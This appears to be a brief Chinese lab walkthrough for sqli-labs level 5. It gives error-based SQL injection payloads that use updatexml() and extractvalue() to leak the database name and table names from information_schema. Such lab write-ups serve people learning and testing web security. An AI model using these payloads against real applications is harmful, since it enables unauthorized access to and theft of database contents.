sqllabs第五关updatexml报错注入

-1' and updatexml(1,concat('~',database(),'~'),1) --+

-1' and updatexml(1,concat('~',(select table_name from information_schema.tables where table_schema=database()limit 1,1),'~'),1) --+

-1' and updatexml(1,concat('~',(select table_name from information_schema.tables where table_schema=database()limit 3,1),'~'),1) --+

下面的都可以按照上面的大家要学会语法

还有下面还有个拓展函数也是报错函数

extractvalue()

id = -1' and (extractvalue(1, concat(0x5c,(select database()))))--+

相关推荐
晴天¥5 分钟前
达梦数据库dexp 和 dimp 应用实例
数据库·达梦数据库
21439659 分钟前
网页如何运行html
jvm·数据库·python
Flying pigs~~14 分钟前
从零到一构建企业级 RAG 问答系统:一个完整的模块化实践指南
数据库·人工智能·缓存·大模型·milvus·知识库·rag
梦想与想象-广州大智汇17 分钟前
告别“内存刺客”!sync-canal-go:轻量mysql实时同步数据到Elasticsearch‌,clickhouse,redis
mysql·elasticsearch·golang·同步数据
2402_8548083718 分钟前
Golang数组和切片有什么区别_Golang数组切片对比教程【通俗】
jvm·数据库·python
2401_8654396319 分钟前
如何在 Go 中精确安装指定版本的模块
jvm·数据库·python
小菜同学爱学习24 分钟前
进阶实操!MySQL常用查询技巧(多场景案例+优化思路)
数据库·mysql
考虑考虑28 分钟前
SQL语句中的模糊查询注意
后端·sql·mysql
zhangchaoxies32 分钟前
c++ rpc框架选择 grpc和thrift哪个更适合c++
jvm·数据库·python
2301_8152795235 分钟前
怎么管理开启了审计日志的金融级数据库实例_合规访问控制
jvm·数据库·python